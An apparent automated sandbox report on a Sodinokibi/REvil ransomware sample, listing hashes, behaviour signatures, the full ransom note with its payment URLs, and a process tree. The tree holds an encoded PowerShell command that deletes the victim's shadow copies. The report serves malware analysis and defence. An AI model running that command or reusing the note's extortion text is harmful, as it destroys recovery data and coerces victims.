Analysis

  • max time kernel
    170s
  • max time network
    170s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:44

General

  • Target

    7e46f081fa8d655a2f4746269727d3922295e67c1dedc164c3f5a131a0654872.exe

  • Size

    143KB

  • MD5

    ef10fc95dd8b99fcd778658fcdd24253

  • SHA1

    0ed24171e09c924ce1b25351d52cfb0137c3b869

  • SHA256

    7e46f081fa8d655a2f4746269727d3922295e67c1dedc164c3f5a131a0654872

  • SHA512

    352ca0ea84c61d2030e2dc114e9bdf1a1e306c9f9a3d62e5e13644f170c9c36968b17201c496c0a12439dac56b50afb5b0aa9655de399144ac949aeae32abf98

Malware Config

Extracted

Path

C:\mdx254a5jx-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion mdx254a5jx. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/57675AE622876F02 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/57675AE622876F02 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ZFHejnxzocsUcBIEobIrY6K+WIh9VvXOVNdgytjtMmwBXXoS2wMHVZWgpG73WWqs i1vNtPgHNtBJfJc1ZO0BnEZuQs/WQhsFEFK8r2uNEo3+yQ5XmlSZgAWO2Lge4aHL fgUQgmoK5nYJbcWhOESfQpNVLvCLs5XBcoFKPBeD0J17hgFeNIibUH6sTonzX+JU MaER6XbeupMkpCkNvZnxoPmM4W1gTx9jLFVQv0igzY/RlxEbg8rtGEU+DCz+hoBH S2iBY0O2kyV9qS5NsLd92YJd5iItKZvh+12nYK007wSZGtpJwu6MfV0D+kTEyguS tA+yniwA/daFhISPKFatBS5qZehojLBjDFU6ZdD5xWwHnX+78zx+LQT8O0VPDFYF HKeDXGoKGyohx+dxgGSjLV3LvYvhr+RpRymhHfYpTs0TBjtpDkVovxmyjlm7uQND uR6XveFmreOjfUvzYKvpeQNXQOhYN51tz7Lqqrc15OLNlYsJtSOmym27rBFPi4Yw JShAz3QNeyYHhqS5bkKXFg2unAGGxdgqgHREPXXbxJm0sHp8/Av4F+LL3ExsncDG pecxVRVALKoKfaSvaGoxRxeZUft0aRegObUBGUWMsFd3UzpJOAiHz5jVAnMV+O/7 2PGT8csA5At9INaSjrWeg6aVIwgQLFhdBDUwE9/UDTpRHa9n3j+kXyaivFSaj4cM 6TzZ3aNdKruwE2J5gt40TX1Jgf7dudpv1JI3Ptc9MuIrTnecBsbMA3tVaaYWZBDS jAdCSA1di7Zfc+cdbBDt6E+4nvV5UG7AzAZBs5B0R7eOZ4Om+H+AjAkdhlcTb8lK CBMt3GokCoJqf37ELrF1QvsjyjdbiLOt3MZLxflvWsGpi4KBlZs+32ar8bIpRDF5 E8TV0LJ2vdkVGlBJai1cm2USkAo6BfT21NqY4f74u43YzJNfZNRw+QLS1JPCWGUz 4wiylfhClMP++iaQgzOIwKbyHYTtheOOzhvUG8Zaq4F1NwfsVQr9ax6wfkutrbUU bgV5KdVoJwZxzsVb7foQSzqeZRYEazzs+4pTkXKYYr1HFa/wR3ViZh/JUZEtA1IR SLwyh/vf9YuNH/4MuQDFKsLxgiyWoR5v2Ct4S2AEfbO+baHG/XtY2aJS9c75GFZ1 zZSeAtma9FTwgXBUGC37rqgTkWhJdfEpJ8rfIWcRzWvCJbuIA0xj4XuU6ta+vLS2 y8tfRTIOi9XveIdxAqkSiiG/lNBuUn1tb5i9JOwBLNX38Xm6vbmTZsA2q9lO9Imr tO2lGTS+hrbDcOioiXd2KjxpSak5LKA9 Extension name: mdx254a5jx ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/57675AE622876F02

http://decryptor.cc/57675AE622876F02

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e46f081fa8d655a2f4746269727d3922295e67c1dedc164c3f5a131a0654872.exe
    "C:\Users\Admin\AppData\Local\Temp\7e46f081fa8d655a2f4746269727d3922295e67c1dedc164c3f5a131a0654872.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1124
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1100
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2288

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1124-119-0x000001AF1DA70000-0x000001AF1DA92000-memory.dmp

      Filesize

      136KB

    • memory/1124-122-0x000001AF1DC20000-0x000001AF1DC96000-memory.dmp

      Filesize

      472KB

    • memory/1124-130-0x000001AF05723000-0x000001AF05725000-memory.dmp

      Filesize

      8KB

    • memory/1124-129-0x000001AF05720000-0x000001AF05722000-memory.dmp

      Filesize

      8KB